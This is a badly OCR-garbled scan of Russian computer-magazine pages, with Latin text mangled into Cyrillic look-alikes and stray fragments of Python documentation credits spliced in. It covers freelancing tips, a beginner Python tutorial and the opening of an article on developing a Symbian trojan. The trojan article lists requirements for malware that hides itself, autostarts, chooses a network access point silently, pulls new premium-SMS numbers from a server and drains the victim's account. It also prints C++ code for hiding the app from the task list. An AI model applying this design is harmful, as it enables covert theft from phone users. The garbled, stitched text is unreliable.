Важный аспект работы дома — родные стены. Сначала они такие 
близкие и уютные, но это только сначала. Потом тебе постоянно хочется 
из них вырваться... Когда дом ассоциируется не с отдыхом, а с работой, 
он начинает жутко напрягать. Это ощущение приходит через 2-3 месяца 
фриланса, а бороться с ним приходится оченьдолго. 

В РАЗГОВОР С ФРИЛАНСЕРОМ 

На самом деле, эта статья собрана из опыта порядка десятка фрилансе- 
ров разного профиля, отжурналистики и дизайна до, собственно, кодин- 
га. Фрилансить строго в одном направлении получается редко, поэтому 
мы собрали для тебя все самое нужное и важное. А вместо заключитель- 
ного абзаца с моралью и идейной мыслью — поставили Васю, он научит. 
Человек-фрилансер, известный в миру как^ібоікі, пишет на А5Р. МЕТ, 
работал на пару крупных компаний, но с лета ушел на свободные хлеба в 
интернет. Атеперь он делится снами советами, типсами итриксами. 

ОраБоте 

С чего начинать — сказать сложно. Человеку, который пока не имеет 
толкового опыта, для начала стоит просто подумать, «а нужно ли мне все 
это». Если нужно — осмотрись, выбери, чем заниматься, посмотри Гугль 
или Яндекс, поищи фрилансовые биржи, оцени заказы, попробуй один- 
два сделать для себя (если раньше вообще нигде не работал). Потом 
потихоньку пробуй участвовать в конкурсах, много читай и набирайся 
опыта. Незабывай следить за временем, можешь почитать что-то по 
психологии, ибо придется повоевать с собой и своими привычками. 

ОБОшиБках 

Ошибки у меня постоянно случаются, — каку любого человека. Решал в 
рабочем порядке и читал много всего, чтобы по возможности избежать. 
Сложнее всего, наверное, говорить«нет». Даже если согласился на 
работу, а она оказалась глупой, скучной или длительной и при этом очень 
дешевой — отказывайся. Когда утебя будет, что предложить заказчику, не 
занижай ставки, цени время и силы. Когда берешься за проект — учись 
верно оценивать силы и время. Это долго не получается, всегда находится 
баг или что-то еще, что мешаетзавершить проекты в срок. Приходится ра- 
ботать в экстремальныхусловиях. Надо оценивать сроки с расчетом на не- 
предвиденныетрудности. С заказчиком нельзя ругаться. Нужно стараться 
предугадать желания заказчика:узнать, что бы он хотел еще добавить к 
сделанному и рассказать ему его же идеи, выдавза свои. Конечно, за от- 
дельную плату. Ну и если на тебя взвалили дополнительную работу, внесли 
коррективы в последний момент илиурезали сроки, решайтакие негатив- 
ные моменты через дополнительные деньги, а не выплесками нервов. В 
идеале, чтобы потокденегне прекращался, нужно постоянно держать на 
прицеле4-5 параллельныхзаказчиков. Несколько небольших проектов 
часто лучше одного большого. Кстати, не бросай старыхзаказчиков, они 
могут подкинуть еще работы. Дергай их иногда, интересуйся делами. 

Орынкеуслуг 

Наибольшее количество заказов — на ПНР. За ним следуют. МЕТ с ^аѵа 
(на них обычно достаточно крупные заказы), ну а замыкают список 

— РуФп с РиЬу. 




^ібоікі собственной персоноіЦ 



Тебе никто 
не поможет! 

Звучит фатально, но если ты схватишь воспаление легких или, там, 
ногу сломаешь, то в больничке тебе особо и не помогут. Если ты 
числишься официальным безработным, то лучше стать на биржу 
труда или получить лицензию индивидуального предпринимате- 
ля, иначе ты рискуешь встретиться с налоговиками или остаться 
без страховки и пенсии. Последнюю можно отправить к черту 
(долго до нее еще) , а вот первые два бпсктора звучат очень опасно. 
Играть в привереду на бирже труда, поступить на заочное или 
придумать еще что-то — это уже твое личное дело, поступай, как 
тебе удобнее. Универсальный способ — фрилансить легально, как 
индивидуальный предприниматель. Но тогда и налоги придется 
платить, как предпринимателю. В общем, ты предупрежден, не 
оставляй этот вопрос без внимания. 



Триланс и..ѵи офис? 

Офис надежнее и спокойнее; фриланс — более напряженный, 
нагруженный и ненадежный, незнаний и опыта приносит намного 
больше. Для меня — пока фриланс. Устану напрягаться — тогда будет 
офис. 
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АЛЕКСЕИ ЧЕРКЕС 



ТІіезѳ сіоситѳпіз аге дѳпѳгаіесі Ігот гѳЗітсШгѳсІТехІ зоигсѳз Ьу 
*8рИіпх*, а сіоситѳпі ргосѳззог зресШсаІІу ѵѵгіиѳп Ьг іИѳ РуіИоп 
сіоситепіа^іоп. 

іал 

\ Ѵг Л/ АЬЕКЗЕУ.СНЕВКЕЗ@ОМАІЬ.СОМ І\ 

Іп ІІ 1 Ѳ опііпѳ ѵѳгзіоп оі іИѳзѳ сіоситѳпіз, уои сап зиЬтіІ соттѳпіз апсі ' 
зиддѳзі сИапдез сіігесііу оп іИе сІоситеп!аііоп радез. 



□ѳѵѳіортѳпі оі ІИѳ сіосиппепіаііоп апсІ і^з ІооІсИаіп Іакѳз ріасѳ оп іИѳ 
сІосз@ру1:Иоп.огд таіііпд Из!. ѴѴе’ге аіѵѵауз Іоокіпд Іог ѵоіипіеѳгз 
ѵѵапііпд іо Иѳір ѵѵіііі іИѳ сіосз, зо іеѳі ігеѳ іо зѳпсі а таіі іИѳгѳ! 



Мапу іИапкз до іо: 

* РгѳсІ I. Огакѳ, іИѳ сгѳаіог оі іііѳ огідіпаі РуіИоп сіоситѳпіаііоп 
іооізѳі апсі ѵѵгііѳг оі тисіі оі іііѳ сопіепі; 

* ІІІѲ Оосиіііз рго]ѳсі іог сгѳаііпд гѳЗігисіигѳсІТѳхі апсі іііѳ Оосиіііз 



зиііѳ; 

* РгѳсІпкІ 
ѴѴІ1ІСІ1 3| 


ИНТИМНОЕ 




Зѳѳ *Рѳр 
Руіііоп 1і 


ЗНАКОМСТВО 


СопігіЬиЧ 

■ 


С РУТНОМ 



ТІ1ІЗ зѳсііоп Іізіз рѳоріѳ ѴѴІ10 ііаѵѳ сопігіЬиіѳсІ іп зотѳ ѵѵау іо іііѳ 
Руіііоп (^осштепіаііог^и^гаЬаЬІ^то^оі^^ 
уои ог ап; 

ѳтаіі іо сІосз@оѵіііоп.огаі. апсі ѵѵѳ’ІІ Ьѳ оіасі іо соггѳсі іііѳ огоЫѳт 



«РуІИоп играет ключевую роль в нашем производственном процессе. 



Без него сложно было бы выпустить такой проект, какБІагѴѴагз: Ерізосіе II» 



Тотту ВигпеКе, старший технический директор, Іпсіизігіаі ЕідЫ 



Ааіі 2 , МісііаѳІ АЬЬоіі, Зіѳѵѳ АІѳхапсІѳг, Лт Аііі зігот. РгѳсІ АІІѳп. А 
Атогозо, Рѳііг Апсіѳгзоп, ОІіѵѳг Апсігісіі, ^ѳзъ8 
Вагсіау, Сіігіз Вагкѳг, Ооп ВазіііогсІ, Апіііопу Вахіѳг, АІѳхапсІѳг 
Вѳіороізку, Вѳппѳіі Вѳпзоп, ^опаіІ 1 ап ВІаск, РоЬіп Воѳгсіук, МісііаІ 
Во 2 оп, А агоп Вгапсоііі. Оѳога ВгапсІІ. Кѳіііі Вгіооз. Іап Вгипііѳіі. Іѳѳ 
ВизЬу, ^с 

Сіѵагіо, М ікѳ СІагкзоп. Зіѳѵѳ СІііі. Раѵѳ Соіѳ. Маііііѳѵѵ Соѵѵіѳз. Цѳгѳппѵ 
Сгаѵѳп, А 

РгѳсІ Р гакѳ. Цг.. Цозіо Ргоіопоа, Оѳіі Еоіѳг. МісііаѳІ Егпзі. Віатѳ 
Апсіу Езкі 

Ріппіѳ, РІѳгпбп Магінпѳ 2 Роііапі, Зіѳіап Ргапкѳ, Лт Риііоп, Рѳіѳг 
Рипк, Еѳіѳ Оаііах, Маііііѳѵѵ ѲаІІадііѳг, Вѳп Оѳгігііѳі 
^опаіі 1 ап Оісісіу, ЗііѳІІѳу Ѳоосіі, МаіііапіѳІ Огау, Ѳгапі Огііііп, Тііотаз 
Ѳиѳіііѳг. АпсІегз Наттагаиізі. Магк НаттопсІ. НагаІсІ РІапсііе-ОІзѳп. Мапиз 






момента основания Ру^Ііоп был важной частью боодіе, и остается ей по мере того. 



как система растет и развивается. Множество инженеров Ооодіе используют РугИоп, 



и мы ищем больше людей, умеющихс ним работать». 



Реіег Ыогѵід, директор по исследованию качества, боодіе, Іпс. 



Н а п сі 
Тііота 
3 і ѳ і а 
Т іі о т а 
РІоррѳг, 
^апзѳп, 



□ 



ще в январеты могзаметить, что мы стали посвящать опре- 
деленное количество журнального пространства замеча- 
тельному языку программирования под названием «Руіііоп». 
С этого выпуска мы будем публиковать по две тематических 
статьи за номер: первая — для тех, кто только начинает изучать этот 
рулезный язык, а вторая — для более-менее продвинутых программеров, 
бопдѳ, ^ Кстати, и Горл, и Никитос — оба записные фанаты Питона ;). Итак, Руіііоп 
(Зиісіо К — это высокоуровневый мультипарадигменный язык программиро- 
Киііітаг вания с динамической типизацией. Он относится к языкам общего 
ОІуріі Ь назначения. Главный акцент в языке делается на чистоту и чита- 
А. Ыпсід бел ьн ость синтаксиса, легкое освоение, минимал истинный дизайн, 
Гипсііі, ^ целостную архитектуру. Благодаря этому, программы на Руіііоп быст- 
Магапд? ро разрабатываются и легко сопровождаются. Исходный текст в 2, а 
МсСгѳа то и 1 0 раз короче, чем код аналогичной программы на ^аѵа! 

Розз М( 

Тотаз( Н ІЕТ'5 РІАУ! 

Раіакой Давай запустим интерпретатор Руіііоп и немного поиграемся. В статье 
Тіт Рѳіі не будет пространных примеров и объяснений — просто куски кода для 
Сіігіз Рі" скорого ознакомления с языком. Что же мы видим? За символами «>>>» 
К. Вѳагт 

Агтіп Р' ► 092 
II, Магк 



идеттекст, вводимый в интерпретатор. После него — ответ интерпрета- 
тора (результат вычисления введенного выражения). 

>>> 2 + 2 
4 

Получается, интерпретатор можно использовать вместо инженерного 
калькулятора на лампах накаливания :). 

»> Сах = 12.5 / 100 # Это комментарий 

»> ргісе = 100.50 

»> ргісе * Сах 

12.5625 

»> ргісе + _ 

113 . 0625 
»> гоипсЗ (_, 2 ) 

Вместо символа подчеркивания подставляется последнее выведенное 
значение. Поддерживается арифметика с вещественными, комплекс- 
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ными числами. Разумеется, «длинная арифметика»тоже 
поддерживается. 

Н ОСНОВЫ ОСНОВ 

Человеку, знакомому с С-подобными языками, синтаксис 
РуШоп может показаться очень необычным, ведь внешний 
видосновныхоператоров РуіЬоп отличается отсвоих 
аналогов в других языках. Это нестрашно, ибо кажуща- 
яся необычностьсинтаксиса не умаляет его достоинств 
— систематичности и последовательности. Привыкание 
наступает быстро — буквально после первых десятков напи- 
санных строк язык будет восприниматься не хуже родного. 
РуіЬоп очень продуман и минималистичен, что отнюдь не 
мешает ему обладать мощностью и гибкостью. Для базового 
знакомства с возможностями этого зеленого змия достаточ- 
но пары-тройки вечеров. Рассмотрим пример: 

»> # Выведем последовательность Фибоначчи. 

. . . # Элемент равен сумме двух предшественни- 
ков . 

... а, Ь = О, 1 
»> ѵ\[]ті1е Ь < 10 : 
ргіпС Ь 

... а, Ь = Ь, а + Ь 
1 1 2 3 5 8 



соЛпд 




»> Рог X іп Іізб: 

. . . ргіпР X, 1еп(х) 

Рубііоп б 
із 2 
СООІ 4 
! 1 

В РуіЬоп цикл Іогумеет перебирать только элементы 
коллекций (в некоторых языках для этого есть ІогеасЬ). 
Очень изящное решение, не правда ли? Ызі: — это список 
из четырех строк. Мы перебираем их в цикле, выводя на 
экран. Итерироваться можно нетолько по встроенным 
коллекциям. Любой объект, предоставляющий интерфейс 
итератора, можно писать вместо нашего списка Іізі;. Ата кие 
объекты встречаются довольно часто, например, итериру- 
ясь по объекту открытого файла, мы будем получать строки 
в нем. Задача печати всех строк в файле займет на одну 
строку больше, чем этот пример (файл нужно еще закрыть). 
Перебор диапазона целых чисел (какэто обычно делалось 
в С) — это частный случай описанной схемы. Есть функция 
гапдеО, которая возвращает коллекцию-диапазон. 

К важным фишкам языка относятся также встроенные 
коллекции: словари (пары ключ-значение), списки 
(динамические массивы), кортежи (близки к неизменя- 
емым спискам), строки (что-то вроде списка символов) и 
множества (неиндексируемые коллекции неповторяю- 
щихся элементов). Для работы сними существует много 
функций, методов и специальных синтаксических средств. 
Все коллекции, кроме строк, являются гетерогенными (в 
них можно хранить объекты разныхтипов данных, включая 
другие коллекции). Благодаря богатству, функциональности 
и простоте использования, они становятся кирпичиками 
твоих программ. Ты уже не думаешь втерминах низкоуров- 
невых циклов и переменных-счетчиков, не забиваешь себе 
голову мыслями о выделении и освобождении памяти и т.п. 
Алгоритм обычно записывается так, каким он и представля- 
ется — наглядно и лаконично. 




• бир://ру1:Ьоп.огд 

— здесь есть все, что 
тебе нужно, включая 
отличный туториал 
для начинающих. 

• бир://ѵѵѵѵѵѵ.іпІ:иіЕги/ 
сІерагІппепДрІ/рѵіЬоп 

— объемный туториал 
на русском. 

• ГЦ. сІіѵеіпІоруіЬоп. 
огдЛос.ЫтІ — уже 
ставшая классикой 
книга «Вглубь языка 
РуШоп». 



РуіЬоп ши роко применяется в научныхрасчетах в качестве опенсорсной альтернатиН 
вы МаіЕаЬ 



Первое, что бросается в глаза — использованиетабуля- 
ций или пробелов (но не то го и другого вместе!) для обоз- 
начения блоков операторов (в С, напомню, используются 
фигурные скобки). Втело цикла входитдве строки. Сперва 
это непривычно, но на самом деле — чертовски удобно! 
Самое главное, что сам языкопределяет единый стиль 
кодирования. Прошу заметить, больше не возникаетмно- 
гостраничныххоливаров на форумах отом, где все-таки 
нужно ставить скобочку. Код автоматически становится хо- 
рошо читаемым. Еще одна из мелочей, обуславливающих 
популярность РуіЬоп — это кортежи. Обрати внимание, как 
в примере присваиваются значения переменным. Пере- 
менные, перечисленные через запятую, образуют кортеж. 
Кортежи — это что-то вроде неизменяемых массивов. Их 
можно присваивать друг другу (как в примере). Чтобы в 
РуШоп поменять местами значениедвух переменныхх и 
у, необязательно вводитьтретью временную переменную. 
Достаточно лишь написать х, у = у, х! 

Кстати, очень остроумно в нем сделан цикл Іог. Вот 
пример: 

»> # Выведем длины всех строк из списка. 

... ІізС = [ ' РуДІіоп ' , ' із ' , ' СООІ ' , ' ! ' ] 



дгі(і(1а(а Іезі (200 роіпи) 
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АЬоиі іііѳш 



соЛпд 



ТПезѳ ^оситѳпіз агѳ оѳпѳгаіѳсі Ігот гѳЗігисШгѳсІТѳхІ зоигсѳз 
*ЗрИіга 
сіосипк 



Іп іИе о 
зиддѳз 



□ѳѵѳІо| 

СІОСЗ@| 

ѵѵапііп^ 



Мапу І 

* РгѳсІ I 
іооізе 




* іИѳ 0{ 
зиііе; 



рогесазіѴѴаІсЬ.сопп используетІ^К^ 



* Ргѳсігі 
ѵѵіаісіа 

8ѳѳ *Р( 
РуІИоп 



СопігіЬ 



В ИГРАЕМСЯ С ФУНКЦИЯМИ 

Функции в РуіЬоп являются объектами первого класса. Это значит, что 
их можно использовать в программе безо всяких ограничений, подобно 
объектам простейшихтипов (числа, коллекции и т.п.). Функции могут 
иметь разную область видимости (локальные, глобальные), переда- 
ваться в другие функции как параметры и возвращаться из них. Память 
под функции выделяется, как и для других объектов. Если на функцию 
закончились ссылки, ее код удаляется сборщиком мусора. Попробую 
объяснить на примере: 



ТЬіз 30 
РуіИоп 
уои ог і 
ѳтаіі Ч 

АаІі2, 1 

Атогв 

Вагсіаі 

ВѳІороІ 

В020П, 

ВизЬу, 

Сіѵагіо, 

Сгаѵѳп 

РгѳсІ Е. 

Апсіу Е 

Ріппіе, 

Рипк, I 

^опа1;I^і 

ѲиѳИІе 

Н а п ( 

ТИ о пп 

8 I е и 

ТИопп 

РІоррѳі 

^апзеп 

бопдѳ, 

Оиісіо I 

КиИІті 

ОІурІі [ 

А. Еіпс1| 

ЕипсІІа, 

Магап| 

МсСгѳі 

Розз N 

Топпаз 

Раіак® 

Тіт Реі 

СИгіз Р 

К. Рее 

Агтіп Р 

II, Магк 



»> сіе:Е таке (а) : 

гекигп ІатЬсіа х: х**а 
»> П2 = таке (2 ) 

»> П4 = таке ( 4 ) 



»> ког і іп 


[1, 


2, 3] 


: ргіпк 


к2 (і) 


14 9 










»> ког і іп 


[1, 


2, 3] 


: ргіпк 


к4(і) 



1 , 16, 81 

Здесь демонстрируется сразу несколько особенностей языка. Рассмотрим 
их подробнее. В РуЖоп можно создавать анонимные (безымянные) функ- 
ции. Еще они называются ІатЬба-функциями (есть раздел математики, на- 
зываемый ІатЬсІа-исчислением, который служиттеоретической основой 
для функционального программирования). Значение выражения ІатЬба 
X: х**а — это функция, имеющая один параметр х и возвращающая этот 
параметр, возведенный в степеньа (** — оператор возведения в степень). 
Имя этой новой функции присваивается вточке вызова таке. Если этого 
не сделать, она просто будетудалена сборщиком мусора. 

Еще одно важное понятие — замыкания (сЬзигез). Замыкание — это функ- 
ция и переменные, используемые в ее лексическом контексте. В данном 
примере наша анонимная функция используетвнешнюю переменную «а», 
хотя она и не передается в нее как параметр. Когда анонимная функция 
создается внутри таке, для нее будет создано замыкание. В него войдетэта 
функция и значение переменной «а». Если пользователь вызоветэту функ- 
цию, значение«а», необходимое для работы, будет извлечено из замыкания 
и использовано. С каждым новым вызовом функции таке создается новое 
замыкание с разными значениями «а». Назначение функции таке — со- 
здавать другие функции (!), которые возводятсвой единственный аргументе 
степень«а». Этотпримерлучше освоить, прежде чем читать дальше :). 
Какбылоуказано выше, РуЖоп — мультипарадигменный язык. Поми- 
мо всего прочего, он содержит элементы аспектно-ориентированного 
программирования (АОП). Об этой парадигме говорят, когда традиционные 
средства ООП в программе не позволяют выделить некоторую функцио- 
нальность в отдельный объект или модуль. Такую функциональность назы- 
ваютсквозной. Классические примерьнтрассировка вызовов, проверка 
инвариантов функции (пред- и пост- условия вызова), обработка ошибоки 
т.п. В программах, написанных на болеетрадиционныхязыках, изменение 
функциональности, по которой не происходило разбиение программы на 

► 094 



Основные 

реализации 

Существует довольно много интерпретаторов Руі:]іоп от разных 
организаций. Ниже приведены основные: 

• СРу^Ьоп — эталонная реализация. Именно над ней работает 
Г видо. Суть в том, что для РунЬоп не существует никаких офици- 
альных стандартов от 150 или АН 51, а в качестве неофициального 
стандарта выступает СРунЬоп. Она написана на чистом С, исходные 
коды открыты. Команды компилируются в байт-код, который затем 
выполняется виртуальной машиной. Ее можно найти в *піх-систе- 
мах, в ѴѴіп на всяких мобильных телефонах и т.п. 

• ^у■^Ьоп^гопРу■^Ьоп — реализация на основе ЛѴМ. Включаетв 
себя интерпретатор, написанный на іаѵа и компилятор в байт-код. 
Предоставляет бесшовную интеграцию іаѵа-классов с Руііюп-клас- 
сами. Есть возможность статической компиляции. Это значит, что 
свои сервлеты и апплеты ты можешь написать на Руі;]іоп. 

I г о п Р у Ь о п — примерно то же самое, что іуіііюп, только для . Ыег- 
платформы. Присутствует интеграция .Пег-типов в РунЬоп-классы 
и обратно. Возникают некоторые трудности с использованием 
СРунЬоп-библиотек. 

• 5гаск1е88 Руі;]іоп — форк СРунЬоп. Оптимизирован для мень- 
шего потребления памяти. Лишен некоторых проблем работы с 
потоками (СІЕ) . Считается, что эта реализация лучше подходит 
для использования на платформах с ограниченными ресурсами, 
такими как микроконтроллеры. 

• РуРу — реализация Руі;1юп, написанная на РунЬоп! Годится для 
легкой проверки новых возможностей. Позволяет транслировать 
код в байткоды других виртуальных машин (Эаѵазсгірі:, ЕЕѴМ, СЕІ 
и.др). 

• Ру 360 — реализация РунЬоп для смартфонов фирмы Покіа. 

Сделана на базе СРунЬоп с добавлением новых модулей для работы 
с5утЬіап05. 

объекты (сквозной функциональности), требует больших затрат, поскольку 
такие изменения задевают большиеучастки кода. Декораторы в Руібоп 
— вотспособ решения проблемы. Декоратор играет рольсвоеобразной 
обертки для метода. Рассмотрим пример: 

»> (іеі 1оддег(1) : 

(Цеі гек ( *агдз, **кѵ7агдз ) : 

. . . ргіпк "епкег іп" , і. пате 

... і( *агдз, **кѵ^агдз) 

... ргіпк "ехік ігот" , і. пате 

гекигп гек 

»> 

»> @1оддег 
. . . (Цек коо (х) : 

ргіпк " коо : " , X 

»> 

»> коо ( "кеііо " ) 
епкег іп коо 
коо: кеііо 
ехік кгот коо 

Функция Іоо помечена декоратором ЙЬддег. Декоратор — это функция 
или класс, предназначенный для изменения других функций. Например, 
применение декоратора ЙЬддегкфункции Іоо эквивалентно следующей 
записи: Іоо = Іоддег(Іоо). То есть, настоящей функцией Іоо становится то, 
что декоратор ЙЬддег вернет, получив на вход нашу Іоо. 

Это несложный декоратор, который просто трассирует вызовы функций, 
выводя на консоль сообщения о входе и выходе из них. Если трассировку 
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Мапу 



* Шѳ 
зиііѳ 



* РгесІ 
ѵѵИіс 



Зѳѳ * 



РуіЬоп, установленный на сервере 



нужно выключить, можно заменить декоратор натакой: сІеиоддег(Я: 
геШгп і". В другихязыкахта кая задача может стать серьезной проблемой, 
но здесь все выполняется буквально в два счета 

В ООП 

Несмотря на то, что РуіЬоп — объекто-ориентированный язык, некото- 
рые аспекты его ООП-модели могут показаться необычными из-за дина- 
мических свойств. Часто можно услышать выражение «утиная типиза- 
ция». Если объект крякает, какутка, и летает, какутка,то РуіЬоп считает 
его уткой. Объект тут похож на мешокдля всякого барахла. Содержание 
мешка определяется во время выполнения программы. В объект можно 
засовывать дополнительные поля, добавлять методы, заменять их 
— в общем, делать все, что угодно. Конструктор класса создает пустой 
мешок, запихиваеттуда кое-какие методы и возвращает программисту. 
При этом нет возможности узнать, каким классом был сделан мешок, 
поскольку все мешки «внешне» одинаковые и различаются только со- 
держанием. Когда интерпретатор видит выражениетипа оЬ].Ш, он берет 
мешок с именем об], роется в нем и, если таковой найдется, выполняет 
методЕ Если нет— прими ошибку времени выполнения. Это и есть дина- 
мическая типизация. 

РуШоп поддерживает полную интроспекцию. В мешке разрешено рыть- 
ся сколько душа пожелает! В нем даже может храниться документация 
к объекту. Более того, сами классы — это тоже объекты! И их тоже можно 
менять во время выполнения. Так мы приходим к важной концепции 
метаклассов, но рассмотрим ее как-нибудь в другой раз. Кстати, забыл 
добавить — РуіЬоп обладаетхорошим механизмом обработки исклю- 
чений. Программулегко разбивать на модули (модули — этотакиеже 
мешки!). Хорошие программы часто пишут вообще без введения пользо- 
вательских классов. Такой подход обеспечивает возможность разбиения 
программы на модули, замыкания, генераторы и другие высокоуровне- 
вые элементы языка. 

г ПОСТАВЛЯЕТСЯ с БАТАРЕЙКАМИ 



• регулярные выражения; 

— самые разнообразные функции для работы стекстом и строками; 

• навороченное, неудобное форматирование вывода, множество мате- 
матических функций; 

• длинная арифметика для вещественных и целых чисел (встроена в язык); 

• библиотеки для работы с основными интернет-протоколами (тіте, 
зппір, рор, )зооп, Ьир, і"1;р, ппір Іеіпеі;, соокіе, сді и т.д); 

• работа с хт [-доку мента ми (есть бот и зах-парсеры); 

• сжатие данных (гір); 

• инструменты для профилирования (измерение производительности 
разныхучастков программы для выявления узких мест); 

• [гатеѵѵогк для юнит-тестирования; 

• автоматическая генерация документации; 

• сериализация объектов; 

• библиотека коллекций; 

• МНОГОПОТОЧНОСТЬ; 

• работа с базами данных; 

• криптографические сервисы (тб5, зЬа, Ьтас, ЬазЫіЬ); 

• работа с сетевыми интерфейсами (какпрямо через сокеты, таки ис- 
пользуя более высокоуровневые абстракции); 

• различные средства взаимодейсвия процессов (ІРС); мультимедиа 
библиотека; 

• сервисы для интернационализации; 

• биндингс библиотекой Тк (для быстрого создания 61Л). 

И это только стандартная библиотека, которая идет в одной поставке с ин- 
терпретатором! Сложно найти область программирования, в которой нельзя 
было бы использовать Ру[Ьоп. Для решения более сложныхзадач написано 
огромное количество сторонних модулей и библиотек. Самое главное, что 
подавляющее их большинство переносимо на все платформы, на которых 
работает интерпретатор. Программа на Ру[Ьоп, использующая эти модули, 
будет работать в разных ОС без изменений в коде! Это превращает РуіЬоп в 
идеальное средство для быстрой и эффективной разработки приложений. 



Общие принципы дизайна РуіЬоп — простота и эффективность — распро- 
страняются и на его стандартную библиотеку. Говорят, что РуіЬоп постав- 
ляется с «батарейками в комплекте» (Ваііегіез Іпсіисіесі). Действительно, 
стандартная реализация (СРуіЬоп) включает в себя большое множество биб- 
лиотек, активно применяемых в повседневном кодинге. Просто перечислю: 

• интерфейс к командам операционной системы; 

• работа с файлами и директориями; 



Н ВЫВОДЫ 

Сегодня на РуіЬоп работаюттысячи приложений — как большие, слож- 
ные и критически важные для ведения бизнеса системы, так и мелкие 
подручныеутилиты, короткие скрипты-эксплойты. Очаровав многих 
программистов, Ру[Ьоп с каждым днем становится все популярнее. На- 
деюсь, из статьи ты понял, почему большая часть редакции ][акера уже 
проголосовала за этотязыкпрограммирования :). ^ 
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5У 



НАПИСАТЬ ТРОЯ В ОБХОД ЗАЩИТЫ 5УМВІАМ? НЕ СОВЕТУЕМ! 



5У 



В свое время мы уже рассказывали о том, как злые люди пишут трояны, спо- 
собные пересылать копии зтз’ок и информацию о звонках на номер хакера. 
Публикации вызвали волну интереса, и до сих пор мне пишут люди с прось- 
бами помочь разобраться в разработке шпионского ПО. Что ж, мы учли спе- 
цифику спроса на софт подобного рода. 



3 

3 



На этот раз мы приоткроем завесутайны над процессом раз- 
работки продвинутого СМС-трояна для смартфонов Мокіа, 
Затзипд и 16 на базе 560. Незаметно для пользователя 
троян умеет сливать деньги со счета. 

г НЕМНОГОТЕОРИИ 

Интерес злоумышленников ктрубкам невинных пользователей поня- 
тен. Смартфон — это личное средство коммуникации, и он нетолько 
содержит разного рода приватную информацию вроде сообщений, лога 
звонков и адресной книги, но и можетвыполнятьоперации, напрямую 
связанные с состоянием денежного баланса (осуществление звонков, 
отправка зппз, использование 6РК5 и т.д.). Учитывая особенности функ- 
ционала смартфонов, я выделил бы три разновидности вредоносного 
ПО, представляющие коммерческую ценность для хакеров: 

1 . Шпионское ПО — программы, сливающие те кеты сообщений, логзвонков 
либо посредством зппз, либо отправкой на сервер злоумышленника. О раз- 
работке подобных программ мы рассказывали в 93-м и 1 03-м номерах ~!г . 

2. Трояны-рассыльщики платных 5М5. Такой софт создается с целью 
наживы. В простейшем варианте программа периодически незаметно 



отправляет Ргетіит 5М5 стоимостью от0,5 $ до 5$ на номер, зарегистри- 
рованный на подставное юридическое (либо — левое физическое) лицо. 

3. Шпионский трекер — программа, использующая функционал 
встроенного О Р5- прием ника, отправляет на сервер злоумышленников 
данные о координатах устройства и, соответственно, его владельца. 
Используется для незаметного слежения за перемещением объекта. 
Этот вид шпионского софта находится пока в зачаточном состоянии, 
так как сильно ограничен модельным рядом смартфонов. Но на рынке 
точно существует, по крайней мере, одна работающая программа-шпи- 
он. Поскольку процесс создания приложений первого типа уже был 
более-менее детально освещен, сейчас мы подробно рассмотрим шаги, 
необходимые для разработки трояна-рассыльщика. В простейшем 
случае алгоритм функционирования несложен — программа устанавли- 
вается в телефон, никакие выдавая свое присутствие. Раз в заданный 
промежуток времени она отправляет Ргетіит 5М5 (отом, что это и как 
зарегистрировать короткий номер — смотри следующий раздел) на за- 
данный номер и... все. Примернотаки функционировал один из первых 
троянов для ЗутЬіап. Очевидно, что этот функционал требует некоторого 
усовершенствования. 
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Н ЛОГИКА ФУНКЦИОНИРОВАНИЯ ПРОДВИНУТОГОТРОЯНА 

Проблема описанной программы заключается втом, что вскоре после 
попадания трояна в аппараты пользователей, факт недобросовест- 
ности арендатора короткого номера, на который отправляется платная 
5ПП5, можетсильно озаботить собственников этого номера. Обычно 
они просто блокируют арендатора, чтобы он не мог более класть деньги 
невинных пользователей ксебе в карман. Но быстро зарегистрировать 
новый короткий номер особого труда не составляет, поэтому неплохо 
было бы, чтобы программа могла периодически обновлять информацию 
отом, куда, собственно, слать платную зтз. Иначе говоря, хакеру надо 
реализовать механизмы соединения программы с сервером и обновле- 
ния настроек. Казалось бы, в чем сложность? А втом, что в смартфонах 
на базе ЗутЬіап все соединения через Іср зоскеіз (втом числе и НТТР 
оѵегТСР) осуществляются посредством так называемой «точки доступа 
в интернет» (Іпіегпеі: Ассезз Роіпі:). Поэтому, если программа использует 
функционал соединения с сетью, пользователь должен задать исполь- 
зуемую точку доступа хотя бы один раз. Троян трудно было бы назвать 
незаметным, если бы он спрашивал у пользователя, какую точку доступа 
ему использовать. Поэтому хакеру предстоит реализовать механизм 



автоматического выбора точки доступа изустановленных в смартфоне и 
определения ее способности быть использованной в качестветранспор- 
та для синхронизации с сервером. Итак, требования к программе можно 
сформулировать следующим образом: 

• Программа должна быть сокрыта от глаз пользователя (нет иконки в 
менютелефона, в Іазк бзі:). 

• Программа автоматически запускается при старте телефона. 

• Программа должна уметьавтоматически определять работоспособную 
точку доступа (ІАР). 

• Программа должнауметьобновлятьданныессервера отом, куда слать 
сообщения. 

• В программе должен быть реализован внятный механизм определе- 
ния периодичности отправки сообщения и сохранения даты последней 
отправки. 

• Программа должна уметь отправлять сообщения. 

Помимо этого, стоит учесть, что софт, устанавливаемый на современные 
смартфоны, работающие под управлением ЗутЬіап 9, должен быть под- 
писан цифровым сертификатом, получаемым в конторе под названием 
5утЬіап5ідпеб. Предлагаю пошагово рассмотреть этапы разработки 
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зловредного ПО и подготовки его к работе. 

Чтобы разобраться в предлагаемом материале, касающем- 
ся непосредственно разработки софта для ЗутЬіап, неплохо 
иметь хотя бы небольшой опыт разработки под эту мобиль- 
ную ОС или, как минимум, ознакомиться с нашими преды- 
дущими статьями, посвященными программированию для 
мобильныхустройств. Тут мною не рассматриваются такие 
вопросы, как базовый костяк приложения, назначение ос- 
новных классов и функций, базовых парадигм и концепций 
ЗутЬіап (в случае чего — списокдополнительных материа- 
лов приведен в конце статьи). 



туальн ой функции ОрбаІеТазкМатеІ, служащей для настройки 
отображения иконки и названия программы в Тазк-листе: 



ѵоій СМедаТгоз : : ІІрсіаЦеТазкЫатеЦ 
( САраШіпсіоѵ^СгоирЫате * аШдЫате ) 

{ 

САкпВоситепР : іІІрсіакеТазкЫатеЬ (аШдЫате) ; 
//вызывается системная функция 
ІІрсіаРеТазкЫатеЬ 

аШдЫате->ЗекНісі(іеп (ЕТгие) ; 

//Прячем приложение из таск-листа 
аШдЫате->ЗекЗузкет (ЕТгие) ; 



Н МЕХАНИЗМ СОКРЫТИЯ ПРОГРАММЫ 

Предположим, что базовый костяк приложения создан. 

Для этого могут быть использованы какСагЬібе С++, так и 
ѴізиаІЗіибіо.МЕТ сустановленной надстройкой СагЬібе. 

